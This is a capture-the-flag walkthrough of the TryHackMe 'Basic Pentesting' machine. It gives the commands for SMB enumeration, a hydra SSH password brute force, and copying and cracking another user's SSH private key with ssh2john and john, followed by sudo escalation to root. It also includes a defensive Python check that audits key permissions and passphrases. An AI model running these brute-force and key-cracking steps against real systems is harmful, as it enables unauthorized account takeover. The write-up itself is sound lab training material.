Kartibok's CTF Journey

A list of my write-ups as well as my methods and ways of completing challenges




Basic Pentesting

tryhackme

nmap

Port 22 SSH
Port 80 HTTP
Port 139 Samba
Port 445 Samba
Port 8009 AJP
Port 8080 HTTP Apache Tomcat 9.0.7

gobuster

The landing page says it is under construction. Enumerating it with gobuster finds:

/development

Continuing the directory search turns up nothing else.

Two files exist in /development:

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

smbmap

smbmap -H <IP>

Lists a share named Anonymous that allows anonymous access.

smbclient //<IP>/Anonymous

Provides staff.txt, a letter confirming two usernames: Jan and Kay.

hydra

hydra -t 4 -l jan -P <path to rockyou.txt> ssh://<MACHINE IP>

Provides Jan’s password armando

ssh

Logging into Jan's account shows nothing of interest, and Jan cannot use sudo.

Investigating the /home directory, we find Kay's home contains:

pass.bak
.ssh

Copy id_rsa from the .ssh directory and save it on the attacking machine.

john the ripper

Convert the key into a John-compatible hash with the following command:

python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

Now use John to crack the hash. This recovers only the passphrase protecting the private key, not Kay's login password.

/usr/sbin/john --wordlist=/root/Desktop/dict/rockyou.txt id_rsa.hash

We find beeswax is the passphrase.
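The weakness that lets Jan reach Kay's account is a private key readable by another user and protected by a dictionary-word passphrase. As an added example (not part of this write-up), here is a Python audit check a sysadmin could run over home directories: it flags group/other-readable key files and detects whether a key is passphrase-protected at all, by reading the legacy PEM DEK-Info header or the ciphername field of the openssh-key-v1 container. The key blobs below are constructed samples, not real key material.

```python
import base64
import stat
import struct

# Constructed legacy-PEM sample with the headers OpenSSL adds when a key is encrypted.
LEGACY_ENCRYPTED = b"""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""

def openssh_v1_sample(ciphername: bytes) -> bytes:
    """Build a minimal (constructed) openssh-key-v1 blob carrying the given ciphername."""
    body = b"openssh-key-v1\x00" + struct.pack(">I", len(ciphername)) + ciphername
    return (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(body)
            + b"\n-----END OPENSSH PRIVATE KEY-----\n")

def key_is_encrypted(pem: bytes) -> bool:
    """True if the private key is passphrase-protected, False if stored in the clear."""
    # Legacy PEM: encryption is signalled by header lines before the base64 body.
    if b"Proc-Type: 4,ENCRYPTED" in pem or b"DEK-Info:" in pem:
        return True
    if b"BEGIN OPENSSH PRIVATE KEY" in pem:
        # New format: magic string, then a length-prefixed ciphername ("none" = unencrypted).
        lines = [ln for ln in pem.splitlines() if ln and not ln.startswith(b"-----")]
        blob = base64.b64decode(b"".join(lines))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(magic)
        (n,) = struct.unpack(">I", blob[off:off + 4])
        return blob[off + 4:off + 4 + n] != b"none"
    return False

def audit_key(pem: bytes, mode: int) -> list:
    """Return findings for one private key, given its bytes and its st_mode bits."""
    findings = []
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("readable by group/other; should be 0600")
    if not key_is_encrypted(pem):
        findings.append("no passphrase; key usable as-is if copied")
    return findings
```

For a real audit, feed `audit_key` the contents and `os.stat(path).st_mode` of each `~*/.ssh/id_*` file; a passphrase being present still says nothing about its strength, which is the second lesson of this box.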

enumeration

From Jan's session on the target host, log in as Kay with the cracked passphrase:

ssh -i /home/kay/.ssh/id_rsa kay@<IP>

We now have Kay's account. Remember pass.bak; cat it:

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Now see what we can do with sudo -l:

User kay may run the following commands on basic2:
  (ALL : ALL) ALL

So we have full control: switch to root with sudo, and in the /root folder we find the congratulations flag.

Regards

K